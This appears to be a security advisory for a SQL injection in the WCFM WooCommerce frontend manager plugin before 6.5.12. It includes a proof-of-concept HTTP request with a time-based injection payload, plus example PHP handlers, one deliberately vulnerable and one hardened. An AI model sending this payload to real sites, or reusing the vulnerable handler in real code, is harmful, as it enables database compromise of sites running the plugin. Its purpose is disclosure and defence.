WCFM - Frontend Manager for WooCommerce < 6.5.12 - Customer/Subscriber+ SQL Injection

WPVDB-ID: C493AC9C-67D1-48A9-BE21-824B1A1D56C2
Published: Oct 11, 2021 - 12:00 a.m.
Author: JrXnm
Source: wpscan.com

CVSS3: 8.8 High (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
  Attack Vector: NETWORK
  Attack Complexity: LOW
  Privileges Required: LOW
  User Interaction: NONE
  Scope: UNCHANGED
  Confidentiality Impact: HIGH
  Integrity Impact: HIGH
  Availability Impact: HIGH

CVSS2: 6.5 Medium (AV:N/AC:L/Au:S/C:P/I:P/A:P)
  Access Vector: NETWORK
  Access Complexity: LOW
  Authentication: SINGLE
  Confidentiality Impact: PARTIAL
  Integrity Impact: PARTIAL
  Availability Impact: PARTIAL

The plugin, when used in combination with another WCFM - WooCommerce Multivendor plugin such as WCFM - WooCommerce Multivendor Marketplace, does not escape the withdrawal_vendor parameter before using it in a SQL statement, allowing low-privilege users such as Subscribers to perform SQL injection attacks.

PoC

With the woocommerce, wc-frontend-manager and wc-multivendor-marketplace plugins installed:

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: [subscriber+]
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 115

action=wcfm_ajax_controller&controller=wcfm-withdrawal-reverse&withdrawal_vendor=1+union+select+1+and+sleep(10)–±
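As an added illustration (not the plugin's own code), the two handlers below show the bug class the description names and its defended form: a hypothetical admin-ajax callback that concatenates withdrawal_vendor into SQL, beside one that enforces a capability and nonce check, coerces the value with absint() and binds it through $wpdb->prepare(). The table name, hook names, nonce action and the manage_woocommerce capability are assumptions chosen for the example.

```php
<?php
// Hypothetical admin-ajax handlers illustrating the bug class on this page.
// Not the plugin's code: table, hook and nonce names are assumptions.

// VULNERABLE form: the raw request value is pasted into the SQL string, so a
// value like "1 union select ..." changes the meaning of the statement, and
// any logged-in user who can reach admin-ajax.php can trigger it.
add_action( 'wp_ajax_demo_withdrawal_reverse_vuln', 'demo_withdrawal_reverse_vulnerable' );
function demo_withdrawal_reverse_vulnerable() {
    global $wpdb;
    $vendor = $_POST['withdrawal_vendor'];                      // untrusted, unchecked
    $sql    = "SELECT * FROM {$wpdb->prefix}demo_withdrawals WHERE vendor_id = " . $vendor;
    $rows   = $wpdb->get_results( $sql );                       // injectable query
    wp_send_json_success( $rows );
}

// HARDENED form: authorisation, CSRF token, type enforcement and a bound
// parameter. Each layer is independent; %d alone already closes the injection.
add_action( 'wp_ajax_demo_withdrawal_reverse', 'demo_withdrawal_reverse_hardened' );
function demo_withdrawal_reverse_hardened() {
    global $wpdb;

    // 1. A Subscriber has no business reversing vendor withdrawals.
    //    manage_woocommerce is assumed to be the right capability here.
    if ( ! current_user_can( 'manage_woocommerce' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. Reject requests that do not carry a valid nonce for this action.
    check_ajax_referer( 'demo_withdrawal_nonce', 'security' );

    // 3. The vendor id is an integer: coerce it and refuse 0 / non-numeric input.
    $vendor = isset( $_POST['withdrawal_vendor'] )
        ? absint( wp_unslash( $_POST['withdrawal_vendor'] ) )
        : 0;
    if ( 0 === $vendor ) {
        wp_send_json_error( 'invalid vendor id', 400 );
    }

    // 4. Bind the value with %d so no SQL syntax from the request reaches MySQL.
    $sql  = $wpdb->prepare(
        "SELECT * FROM {$wpdb->prefix}demo_withdrawals WHERE vendor_id = %d",
        $vendor
    );
    $rows = $wpdb->get_results( $sql );
    wp_send_json_success( $rows );
}
```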

Affected software (CPE)
  Name: wc-frontend-manager
  Operator: lt
  Version: 6.5.12

